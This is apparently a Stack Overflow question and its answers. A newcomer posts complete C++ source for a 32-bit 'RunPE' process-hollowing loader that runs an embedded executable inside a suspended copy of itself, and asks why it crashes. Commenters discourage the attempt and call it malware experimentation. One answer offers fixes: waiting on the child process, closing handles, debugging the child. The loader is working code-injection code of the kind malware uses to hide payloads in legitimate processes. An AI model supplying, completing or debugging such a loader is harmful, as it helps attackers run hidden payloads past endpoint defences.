
Hi, I want to execute the binary code of an exe / dll file from memory, and I found this code:

#include <iostream> // Standard C++ library for console I/O
#include <string> // Standard C++ Library for string manip

#include <Windows.h> // WinAPI Header
#include <TlHelp32.h> //WinAPI Process API

// Classic "process hollowing" (RunPE) loader: starts a suspended copy of the
// current executable, replaces its in-memory image with the PE held in `Image`,
// points the suspended main thread at the new entry point and resumes it.
// The API sequence used here (CreateProcess with CREATE_SUSPENDED ->
// GetThreadContext -> VirtualAllocEx/WriteProcessMemory into another process
// -> SetThreadContext -> ResumeThread) is the textbook hollowing pattern that
// endpoint-protection products and ETW/Sysmon-based detections key on, so it
// is routinely flagged or blocked.
//
// Image: pointer to a complete PE file image (DOS header, NT headers, section
//        table, raw section data) in this process's memory. The buffer is
//        trusted blindly: no size is passed in and no header field (e_lfanew,
//        NumberOfSections, PointerToRawData, SizeOfRawData) is bounds-checked,
//        so a malformed image reads out of bounds.
// Returns 0 once the child thread has been resumed. On every failure path
//        (not a PE, CreateProcessA or GetThreadContext failed) control falls
//        off the end of a non-void function, which is undefined behaviour, so
//        callers cannot tell failure from success.
// 32-bit only: pointers are truncated to DWORD and the Ebx/Eax members of
// CONTEXT are used, which do not exist in a 64-bit CONTEXT.
int RunPortableExecutable(void* Image)
{
    IMAGE_DOS_HEADER* DOSHeader; // DOS ("MZ") header at the start of the image
    IMAGE_NT_HEADERS* NtHeader; // NT ("PE\0\0") headers, located via e_lfanew
    IMAGE_SECTION_HEADER* SectionHeader; // cursor over the section table

    PROCESS_INFORMATION PI; // handles and ids of the suspended child
    STARTUPINFOA SI;

    CONTEXT* CTX; // register state of the child's main thread

    DWORD* ImageBase; // receives the child's original image base (read, never used)
    void* pImageBase; // base of the region allocated in the child for the new image

    int count;
    char CurrentFilePath[1024]; // path of this executable, reused as the host process

    DOSHeader = PIMAGE_DOS_HEADER(Image); // Initialize Variable
    NtHeader = PIMAGE_NT_HEADERS(DWORD(Image) + DOSHeader->e_lfanew); // e_lfanew comes from the untrusted buffer unchecked

    GetModuleFileNameA(0, CurrentFilePath, 1024); // path to current executable; return value not checked

    if (NtHeader->Signature == IMAGE_NT_SIGNATURE) // Only the PE signature is validated; the DOS e_magic is not.
    {
        ZeroMemory(&PI, sizeof(PI)); // Null the memory
        ZeroMemory(&SI, sizeof(SI)); // Null the memory

        if (CreateProcessA(CurrentFilePath, NULL, NULL, NULL, FALSE,
            CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) // Create a new instance of current
            //process in suspended state, for the new image.
        {
            // Allocate memory for the context.
            // NOTE(review): sizeof(CTX) is the size of the pointer variable, not
            // of CONTEXT, and the VirtualAlloc result is not checked for NULL.
            CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
            CTX->ContextFlags = CONTEXT_FULL; // request the full register set

            if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //if context is in thread
            {
                // Read the child's recorded image base. At thread start on 32-bit
                // Windows Ebx holds the PEB address and offset 8 is
                // PEB.ImageBaseAddress; this relies on an undocumented layout.
                ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&ImageBase), 4, 0);

                // Reserve and commit (0x3000 == MEM_COMMIT | MEM_RESERVE) an RWX
                // region at the image's preferred base. If that address is not
                // free the call returns NULL, which is not checked; no relocation
                // processing is done anywhere in this function.
                pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
                    NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);

                // Copy the PE headers into the child (return value unchecked)
                WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);

                // Copy each section from its raw file offset to its virtual address
                for (count = 0; count < NtHeader->FileHeader.NumberOfSections; count++)
                {
                    // 248 == sizeof(IMAGE_NT_HEADERS32), 40 == sizeof(IMAGE_SECTION_HEADER);
                    // hard-coded, so FileHeader.SizeOfOptionalHeader is ignored.
                    SectionHeader = PIMAGE_SECTION_HEADER(DWORD(Image) + DOSHeader->e_lfanew + 248 + (count * 40));

                    WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + SectionHeader->VirtualAddress),
                        LPVOID(DWORD(Image) + SectionHeader->PointerToRawData), SectionHeader->SizeOfRawData, 0);
                }
                // Overwrite the child's recorded image base with the injected
                // image's preferred base.
                WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8),
                    LPVOID(&NtHeader->OptionalHeader.ImageBase), 4, 0);

                // Move address of entry point to the eax register (the thread's
                // start address at process creation on 32-bit Windows)
                CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
                SetThreadContext(PI.hThread, LPCONTEXT(CTX)); // Set the context
                ResumeThread(PI.hThread); // Start the thread at the new entry point

                return 0; // Operation was successful.
                // Note: PI.hProcess and PI.hThread are never closed and CTX is never freed.
            }
        }
    }
}

// enter valid bytes of a program here.
// Placeholder payload buffer: 37376 bytes, of which only the first 24 are
// given (they begin with 0x4D 0x5A, the "MZ" DOS-header magic); the rest is
// zero-filled by the initializer, so as shipped this is not a complete image.
unsigned char rawData[37376] = {
    0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
    0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};

// Entry point: hand the embedded buffer to the loader, then block on stdin so
// the console window stays open until a key is pressed.
int main()
{
    // The loader's return value carries no failure information, so it is ignored.
    (void)RunPortableExecutable(rawData);
    getchar(); // keep the console open
    return 0; // explicit; main() in C++ returns 0 implicitly anyway
}

I found this code on GitHub; when I start it, it just waits and does nothing. Then I replaced the bytes in the project with my own binary code, like this: enter image description here

It's too long, so I'm sharing a picture.

When i debug it i see this error:

enter image description here

But it also sometimes works?!

enter image description here

What is the problem, and how can I solve it? That's really weird :/

This is what I use in Visual Studio (sorry, I'm new and extremely noob :D)

enter image description here

enter image description here

    If you are a noob, how would you expect to understand the solution? – jtxkopt Sep 10 '22 at 21:36
    If you are new to the language, there is no reason for you to try to do this. This is something you need only for rather advanced things like writing JIT compilers. This is also full of platform-specific code. Learn the language properly from some structured material, e.g. the [recommended books](https://stackoverflow.com/questions/388242/the-definitive-c-book-guide-and-list). – user17732522 Sep 10 '22 at 21:38
  • @jtxkopt i know a few languages like python and c# but i can understand it a little. – noobirasit Sep 10 '22 at 21:40
  • I don't understand Turkish(!) messages, but recognize the code 0xc0000005- memory access violation. – BoP Sep 10 '22 at 21:42
    I mean, it involves [**Portable Executable**](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format) details and x86 assembly language. They are highly technical concepts for a noob. And knowing C# and Python doesn't help you. – jtxkopt Sep 10 '22 at 21:43
  • Okey how we can solve these errors? – noobirasit Sep 10 '22 at 22:03
    You would not comprehend the solution. You should postpone your malware experiments until you know how to read documentation and write code. – IInspectable Sep 11 '22 at 06:37
    Everyone above is correct. You can't hope to achieve something like this without gaining a deep understanding of numerous topics. Like you don't start a course in nuclear physics and expect to be able to build a reactor on day 1 – David Heffernan Sep 11 '22 at 07:16


Remember that you're forking the same process and rewriting the process memory with your custom PE file, so when the process starts it will start as a child of the stub executable, and it seems that you're not waiting on the process handle for the child to finish:

    // Block until the child process exits (return value unchecked; WAIT_FAILED
    // is possible if the handle is invalid).
    WaitForSingleObject(
        PI.hProcess,
        INFINITE
    );

    // dwRet must be declared as a DWORD by the caller; the BOOL result of
    // GetExitCodeProcess is not checked here.
    GetExitCodeProcess(
        PI.hProcess,
        &dwRet
    );

    // Release the kernel handles returned by CreateProcessA.
    CloseHandle(PI.hThread);
    CloseHandle(PI.hProcess);

Also, you might be interested in attaching a debugger (e.g. x64dbg) to the child process and checking whether it is raising any exception itself.
